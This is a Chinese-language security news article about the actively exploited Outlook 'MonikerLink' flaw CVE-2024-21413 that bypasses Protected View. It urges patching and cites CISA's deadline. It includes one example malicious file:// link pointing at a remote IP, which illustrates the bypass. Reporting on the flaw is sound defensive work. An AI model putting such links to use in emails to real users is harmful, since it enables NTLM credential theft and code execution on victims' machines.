Microsoft Outlook高危在野漏洞正被积极利用

Microsoft Outlook 中的一个严重漏洞（跟踪为 CVE-2024-21413）正在被广泛利用，对全球组织构成重大威胁。此漏洞的 CVSS 评分为 9.8 分（满分 10 分），允许攻击者远程执行任意代码，只需用户打开恶意电子邮件即可。

该漏洞由 Check Point 安全研究员李海飞发现，影响了 Microsoft Office 的多个版本，包括 Office 2016、2019、LTSC 2021 和 Microsoft 365 企业版应用程序。该漏洞在于 Outlook 在处理包含恶意链接的电子邮件时输入验证不当。至关重要的是，它允许攻击者绕过受保护视图（旨在以只读模式打开 Office 文件的安全功能），而是以完全编辑模式打开恶意文档。

该漏洞被 Check Point 称为“名字链接”，它利用了 Outlook 处理 file:// 协议链接的方式中的漏洞。通过在 URL 中的文件扩展名后添加感叹号和任意文本（例如，<a href=“file:///\10.10.111.111testtest.rtf！something”>CLICK ME</a>），攻击者可以绕过 Outlook 的安全限制。这允许客户端在不触发警告的情况下访问远程资源，从而有效地为恶意负载打开大门。Check Point 证实了该漏洞在最新的 Windows 10/11 和 Microsoft 365 （Office 2021） 环境中的有效性，这表明其他 Office 版本可能会受到影响。他们认为这是 Windows/COM 生态系统中一个长期存在的问题，存在于核心 COM API 中。

成功利用此漏洞的影响非常严重，包括窃取 NTLM 凭据信息和通过恶意制作的 Office 文档执行任意代码。这可能允许攻击者完全控制受害者的计算机、窃取敏感数据、部署勒索软件或执行其他恶意活动。

网络安全和基础设施安全局 （CISA） 已发出警告，要求美国联邦机构在 2 月 27 日之前针对这一被积极利用的漏洞修补其系统。鉴于漏洞的严重性和持续的攻击，尚未更新其 Outlook 版本的组织将面临重大风险。

尽管 Microsoft 最初否认 CVE-2024-21413 在零日攻击中被利用，但最近的报告表明威胁行为者主动滥用。GitHub 上发布了概念验证 （PoC） 漏洞，进一步增加了广泛攻击的风险。

Check Point 强烈建议所有 Outlook 用户尽快应用官方 Microsoft 补丁。此关键更新对于防止此被积极利用的漏洞并防止潜在的毁灭性后果至关重要。不要等待 - 立即修补！

相关文章：

针对 Microsoft Outlook RCE 漏洞发布的 PoC 漏洞 – CVE-2024-21413

https://securityonline.info/poc-exploit-released-for-microsoft-outlook-rce-flaw-cve-2024-21413/

Microsoft 发出 Outlook RCE 缺陷 – #MonikerLink 错误的警告 （CVE-2024-21413）

https://securityonline.info/microsoft-warns-of-outlook-rce-flaw-monikerlink-bug-cve-2024-21413/

原文始发于微信公众号（赛哈文）：Microsoft Outlook高危在野漏洞正被积极利用